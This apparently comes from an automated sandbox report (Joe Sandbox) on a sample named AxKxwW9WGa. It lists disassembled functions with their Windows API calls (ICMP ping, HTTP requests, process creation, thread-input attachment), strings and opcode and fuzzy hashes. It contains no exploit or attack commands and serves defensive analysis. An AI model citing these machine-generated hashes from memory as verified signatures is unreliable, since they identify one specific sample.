Opcode Fuzzy Hash: 3b1cea7e1aef692dd53e5cee4975fe51dd989bb061ac64af91237ee7d0491b2f
Instruction Fuzzy Hash: D861B070608312AFD710DF14C848FABBBE8AF45754F04041EF9819B291DB78ED49CBAA

Function 004B5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004B5793
inet_addr.WSOCK32(?,?,?), ref: 004B57D8
gethostbyname.WSOCK32(?), ref: 004B57E4
IcmpCreateFile.IPHLPAPI ref: 004B57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004B5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004B5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004B58ED
WSACleanup.WSOCK32 ref: 004B58F3

Strings

Ping, xrefs: 004B5816

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d9fa4907d08be21224e07aeeb174852b5021d5eb8fb8ad5c95f0e3faa86e6a43
Instruction ID: 5b04130230de6fcb9bbda9732178e4ce27900eab412954ec5661fa2916445153
Opcode Fuzzy Hash: d9fa4907d08be21224e07aeeb174852b5021d5eb8fb8ad5c95f0e3faa86e6a43
Instruction Fuzzy Hash: 6151A0316006009FDB10EF25DC45B6AB7E4EF48724F04492AF956DB2A1DB78EC14DB6A

Function 004AB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004AB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004AB546
GetLastError.KERNEL32 ref: 004AB550
SetErrorMode.KERNEL32(00000000,READY), ref: 004AB5BD

Strings

NOTREADY, xrefs: 004AB57C
READY, xrefs: 004AB596
UNKNOWN, xrefs: 004AB575
INVALID, xrefs: 004AB58F
READONLY, xrefs: 004AB588

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: a3491cfa49df9646cfce7dc34ef0058ab673d75ba946a6720b3fa05575d46222
Instruction ID: 984c8f83200b373d9385faa27d814a3a9f5cac5b028902d896a2f7e37bca2794
Opcode Fuzzy Hash: a3491cfa49df9646cfce7dc34ef0058ab673d75ba946a6720b3fa05575d46222
Instruction Fuzzy Hash: CA31A875E00209AFDB00DB98C845EBE7774EF59318F14412BF50197292DB799942DB85

Function 00498F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 0049AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0049AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00499014
GetDlgCtrlID.USER32 ref: 0049901F
GetParent.USER32 ref: 0049903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0049903E
GetDlgCtrlID.USER32(?), ref: 00499047
GetParent.USER32(?), ref: 00499063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00499066

Strings

ComboBox, xrefs: 00498F9C
ListBox, xrefs: 00498FD1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 1df7bd6919bf4b591a50177911b968055e58c3e8aaca8b35313ae9bee9b7ae91
Instruction ID: 26c293699fa4f898cdbfcff8c10cab5bdcaf369bf0b027a77540bd2748ffd9b5
Opcode Fuzzy Hash: 1df7bd6919bf4b591a50177911b968055e58c3e8aaca8b35313ae9bee9b7ae91
Instruction Fuzzy Hash: 2421B874A00108BBDF05ABA5CC85EFEBB75EF49310F10012AF561572A1DB7D5819DB28

Function 0049907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

Part of subcall function 0049AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0049AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004990FD
GetDlgCtrlID.USER32 ref: 00499108
GetParent.USER32 ref: 00499124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00499127
GetDlgCtrlID.USER32(?), ref: 00499130
GetParent.USER32(?), ref: 0049914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0049914F

Strings

ComboBox, xrefs: 00499087
ListBox, xrefs: 004990BC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 7a19f6f23212c7f58e0e7b23e0eb91ce04b7660d37652355cdfdd58741d8ebf5
Instruction ID: e66b3e994d16d11239089ad3d19f5beb30483418c9f964bd7f57919a92f79812
Opcode Fuzzy Hash: 7a19f6f23212c7f58e0e7b23e0eb91ce04b7660d37652355cdfdd58741d8ebf5
Instruction Fuzzy Hash: C821C874A00109BBEF01ABA5CC85EFEBB75EF48300F50402BF551972A2DB7D581ADB29

Function 00499163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0049916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00499184
_wcscmp.LIBCMT ref: 00499196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00499211

Strings

SHELLDLL_DefView, xrefs: 00499190
largeicons, xrefs: 004991A5
list, xrefs: 004991F3
details, xrefs: 004991BF
smallicons, xrefs: 004991D9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 5dd697974eb443e648409caf966e76beebe9200633a2f8fe71d3732a35a36436
Instruction ID: e5f455603a4874846e2c4c4630beceb4181fbd59459005f2f2e387bcd9b07c01
Opcode Fuzzy Hash: 5dd697974eb443e648409caf966e76beebe9200633a2f8fe71d3732a35a36436
Instruction Fuzzy Hash: B611C47A288307B9FE212728DC06DA73B9CAB15720B20047BFA00A5191FEAE5C525A5D

Function 004A7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 004A7A6C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 0a4cbf452ccbbd56ba0f9697e6ae96fbcc845b13fe0aaf5d5dd9703d6a1bc318
Instruction ID: c3660315f97c7c0ab81b9115d34500c8e1caef585a408d35e775bec7c7c3695c
Opcode Fuzzy Hash: 0a4cbf452ccbbd56ba0f9697e6ae96fbcc845b13fe0aaf5d5dd9703d6a1bc318
Instruction Fuzzy Hash: E6B1A1719042199FDB20DF95CC84BBFB7B5FF2A324F24442AE501E7241D738A941DBA9

Function 004A11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004A11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004A0268,?,00000001), ref: 004A1204
GetWindowThreadProcessId.USER32(00000000), ref: 004A120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004A0268,?,00000001), ref: 004A121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 004A122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004A0268,?,00000001), ref: 004A1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004A0268,?,00000001), ref: 004A1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004A0268,?,00000001), ref: 004A129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,004A0268,?,00000001), ref: 004A12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,004A0268,?,00000001), ref: 004A12BC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 201458f971551139e26bf7c681d3413dfa8675bf7eb5498235dbbd1604a78ac5
Instruction ID: a95540a211972a5854a102340287db3c0393939ecb3de82a73c840efcfa4e9b3
Opcode Fuzzy Hash: 201458f971551139e26bf7c681d3413dfa8675bf7eb5498235dbbd1604a78ac5
Instruction Fuzzy Hash: 0631A076600205BFEB209F54EC88F6E77AAEB76351F104166F900E62B0D77CDD489B68

Function 0044FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0044FAA6
OleUninitialize.OLE32(?,00000000), ref: 0044FB45
UnregisterHotKey.USER32(?), ref: 0044FC9C
DestroyWindow.USER32(?), ref: 004845D6
FreeLibrary.KERNEL32(?), ref: 0048463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00484668

Strings

close all, xrefs: 0044FAA1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a6f3e46f469aacc66f64bd35074ba03f63711701695b773e4ac7384ae4b15fc6
Instruction ID: 24b42dbb1d755ab6336f6f6e28a44900df2ea142626513cf531471b65ef3628a
Opcode Fuzzy Hash: a6f3e46f469aacc66f64bd35074ba03f63711701695b773e4ac7384ae4b15fc6
Instruction Fuzzy Hash: F3A17D30701212CFDB19EF15C594A6EF361BF45704F1046AFE80AAB262DB38AD1ACF59

Function 004B9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004B9167
VariantInit.OLEAUT32(?), ref: 004B9238
VariantInit.OLEAUT32(?), ref: 004B9339
VariantClear.OLEAUT32(?), ref: 004B9343
VariantClear.OLEAUT32(?), ref: 004B93A0

Strings

,,M, xrefs: 004B91E5
Incorrect Object type in FOR..IN loop, xrefs: 004B931C
Null Object assignment in FOR..IN loop, xrefs: 004B91C8, 004B92F6, 004B93AE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,M$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-1013860459
Opcode ID: cf025ec1f44e220373a08d8b25dc07d9d42a15b8e0b3f5bea5fb4a1a71019e12
Instruction ID: 1609cdb068be7c9d533d4c373a5603a3e12e62264b0e6ce43a0ebdfb994abe32
Opcode Fuzzy Hash: cf025ec1f44e220373a08d8b25dc07d9d42a15b8e0b3f5bea5fb4a1a71019e12
Instruction Fuzzy Hash: 03918231900215ABDF24CFA5C844FEFB7B8EF45714F10855AEA15AB280D7789D45CBA8

Function 0049A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0049A439), ref: 0049A377

Strings

INSTANCE, xrefs: 0049A285
TEXT, xrefs: 0049A2AE
CLASSNN, xrefs: 0049A119
NAME, xrefs: 0049A1A9
REGEXPCLASS, xrefs: 0049A13C
CLASS, xrefs: 0049A0F6

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: aa0794af13b633466ee92e07d964539b25365f0aff7bc49fc2aa1d2b49eea0ba
Instruction ID: f607e019120c0e11481d047d3369ad7008f460d24c117c48ac3c1bdeb0dba2f8
Opcode Fuzzy Hash: aa0794af13b633466ee92e07d964539b25365f0aff7bc49fc2aa1d2b49eea0ba
Instruction Fuzzy Hash: 6E91B370600605AADF08DFA1C446BEEFF74BF04304F54812FD84AA7251DB3869A9DBDA

Function 00442E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00442EAE

Part of subcall function 00441DB3: GetClientRect.USER32(?,?), ref: 00441DDC
Part of subcall function 00441DB3: GetWindowRect.USER32(?,?), ref: 00441E1D
Part of subcall function 00441DB3: ScreenToClient.USER32(?,?), ref: 00441E45

GetDC.USER32 ref: 0047CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0047CD45
SelectObject.GDI32(00000000,00000000), ref: 0047CD53
SelectObject.GDI32(00000000,00000000), ref: 0047CD68
ReleaseDC.USER32(?,00000000), ref: 0047CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0047CDFB

Strings

U, xrefs: 0047CCD0

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 063d6e5b9a5f0fee2eb68dde0d837ba01a79ea0273a2b7dd0ee57ba69cdb933e
Instruction ID: 438975f208090808365c7982ddedbc9ddb5505f61865a8b920446637a8021388
Opcode Fuzzy Hash: 063d6e5b9a5f0fee2eb68dde0d837ba01a79ea0273a2b7dd0ee57ba69cdb933e
Instruction Fuzzy Hash: 3A71AC31500205DFDF218F64C884AEB7BB5FF48324F24826FFD595A2A6D7388885DB69

Function 004B1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004B1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004B1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 004B1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004B1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004B1B10
InternetCloseHandle.WININET(00000000), ref: 004B1B57

Part of subcall function 004B2483: GetLastError.KERNEL32(?,?,004B1817,00000000,00000000,00000001), ref: 004B2498
Part of subcall function 004B2483: SetEvent.KERNEL32(?,?,004B1817,00000000,00000000,00000001), ref: 004B24AD

Strings

, xrefs: 004B1B01

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 14a312665013f90a4194770bd258327ccaa61a935f74b7f6e01beeb5559fd9fc
Instruction ID: 73fc69510e59bf69dbac315ba876aca40b2fecbd2c32bd80b7258abbbde5b3ff
Opcode Fuzzy Hash: 14a312665013f90a4194770bd258327ccaa61a935f74b7f6e01beeb5559fd9fc
Instruction Fuzzy Hash: 49418FB1501208BFEB118F50CC99FFB77ADEB08354F00412BFA059A251E778AE449BB9

Function 004B8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,004CF910), ref: 004B8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,004CF910), ref: 004B8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004B8ED6
SysFreeString.OLEAUT32(?), ref: 004B8F00

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 08f4deb63515f9b5c7868e627c0857c8151cef0273c189ff3f443fdef266cd72
Instruction ID: ce9b0306f36b1605d46aa30eb8056076b9f0b3165a6a66a898e785ff92b50c42
Opcode Fuzzy Hash: 08f4deb63515f9b5c7868e627c0857c8151cef0273c189ff3f443fdef266cd72
Instruction Fuzzy Hash: 29F13871A00209AFDF04EF94C884EEEB7B9FF45314F10849AF905AB251DB35AE46CB65

Function 004BF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004BF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004BF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004BF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004BF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004BF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004BFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004BFA7C
CloseHandle.KERNEL32(?), ref: 004BFAAB
CloseHandle.KERNEL32(?), ref: 004BFB22

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 21f39cbb214cce91e711b5f4f5a78b6eee64a1cc32a10174358d03fe12ffec0a
Instruction ID: e74885fc5c6837c35c3fdc51b9b8a9017fc4ae5b2be2416457cfbafb2b2d319d
Opcode Fuzzy Hash: 21f39cbb214cce91e711b5f4f5a78b6eee64a1cc32a10174358d03fe12ffec0a
Instruction Fuzzy Hash: 40E193712042409FD714EF25C841B6BBBE1EF85314F14856EF8899B3A2DB39EC49CB5A

Function 004A4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004A3697,?), ref: 004A468B

Part of subcall function 004A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004A3697,?), ref: 004A46A4

Part of subcall function 004A4A31: GetFileAttributesW.KERNEL32(?,004A370B), ref: 004A4A32

lstrcmpiW.KERNEL32(?,?), ref: 004A4D40
_wcscmp.LIBCMT ref: 004A4D5A
MoveFileW.KERNEL32(?,?), ref: 004A4D75

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 3747da618df94348f0d1f0b1572b3d07a835c15d8402781f9c61b2cc081f9b79
Instruction ID: 4a6567077ec5a306309493ef4d5b6943acac7b645c147216b798d56a77841373
Opcode Fuzzy Hash: 3747da618df94348f0d1f0b1572b3d07a835c15d8402781f9c61b2cc081f9b79
Instruction Fuzzy Hash: B85173B24083849BD764DB61D8819DFB3ECAFD5314F00092FB689C3152EF78A589C76A

Function 004C8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004C86FF

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
